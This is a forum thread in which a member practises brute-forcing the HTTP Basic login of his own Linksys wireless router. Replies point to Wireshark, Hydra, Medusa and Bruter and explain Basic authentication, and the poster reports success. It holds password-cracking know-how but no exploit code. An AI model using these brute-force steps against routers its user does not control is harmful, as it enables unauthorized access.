Results 1 to 6 of 6

Thread: Trying to bruteforce my linksys wireless router

  1. #1
    Member
    Join Date
    May 2008
    Posts
    190

    Default Trying to bruteforce my linksys wireless router

    Once I connect to my Linksys BEFW11S4 V4 wireless router via wireless card, I can view the router's web page. It prompts me for a user name and password. I'm going to use this tutorial
    Code:
    http://forums.remote-exploit.org/showthread.php?t=14910
    to get some experience on how to fully utilize hydra.

    Anyhow, I'm trying to find a way to get the source code of that login popup that way I can see the form and action of how the login script works. I'm using Firefox 3, but I can't view the source because the login popup is exclusive, meaning that I can't click on anything else until I complete the login popup. I've taken a look at the source of the router's main web page(where all the router settings are). I'm assuming that this page is the index.html. Anyhow there's nothing that resembles the code of the login popup. I'm sure the login script would be a separate file. I tried other stuff, like lynx [router ip] -source > source.html but I am unable to extract the source.

    What other ways are there to get the source of that login popup?

  2. #2
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Wireshark, might be not as comfortable as other tools but you will definately get it.
    Tiocfaidh ár lá

  3. #3
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    *login popup is basic http auth .. its not HTML ...
    http://en.wikipedia.org/wiki/Basic_a...authentication
    * you dont need the source to use hydra less its a POST based auth page ( in your case this is basic auth not POST auth )

  4. #4
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    I've used Hydra and Medusa extensively. I'd try using Bruter instead to view your page source:
    http://sourceforge.net/project/platf...roup_id=204020

    It's Windows based, but you should be able to run it in Wine. It will populate your username and password fields for you.

    William

  5. #5
    Member
    Join Date
    May 2008
    Posts
    190

    Default

    Nice, I used wireshark to see the type of authentication. In the packet after the 3 way handshake, under the authorization tab, it straight out said "Basic" and then had a Base64 string, which was the encrypted text of the credentials I inputed. I fired up bruter in a windows virtual and it worked like a charm.

    I was examining the packets in wireshark. I noticed that after the 3 way handshake, there wast a GET / HTTP/1.1. In the same packet, under the http section of the packet, were my credentials. Then there were two packets, I'm guessing for ACK and one said rebuilding PDU. Then I get the packet that contains the unauthorized html page from the target. The authentication method was HTTP Basic HEAD.

    Now if this were a HTTP Basic GET, how would the packet structure be different? How would I distinguish between the two HTTP Basic HEAD and HTTP Basic GET? It seemed that in this situation (HTTP Basic HEAD), in the packet after the 3 way handshake I get the http from the target and in that same packet I include the credentials. So it seems to make sense that this would be HTTP Basic HEAD.

  6. #6
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    6

    Default

    An easier way might be to just telnet to the site and do a:

    GET / HTTP/1.0
    <return>
    <return>

    ?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •